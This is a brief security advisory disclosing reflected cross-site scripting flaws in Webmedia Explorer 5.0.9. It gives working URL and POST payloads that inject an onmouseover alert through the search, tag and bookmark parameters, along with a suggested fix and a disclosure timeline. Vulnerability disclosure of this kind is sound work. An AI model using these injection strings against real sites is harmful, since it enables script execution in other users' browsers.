Webmedia Explorer - Cross Site Scripting Vulnerability
Version Affected: 5.0.9 (newest is: 5.10.0)
Info: Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a website realtime taking advantage of a very powerful rendering and data fetching caching system.
-:: The Advisory ::-
Vulnerable Function / ID Calls:
search, tag, bookmark & "another function that registers all extra calls"
Cross Site Scripting: (by using event handlers)
http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over the search field.
http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over a tag.
http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > ---
-- Will be executed when a user moves his mouse over the column field. (unlikely)
http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
-- Requires admin access, however since this is a hidden tag exploitation is highly unlikely.
POST Method - Cross Site Scripting:
(the following was sent: " onmouseover=alert(0) > --- )
-:: Solution ::-
Filtering event handlers should do the trick.
A pretty secure system over all, nice to see.
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
All of the best,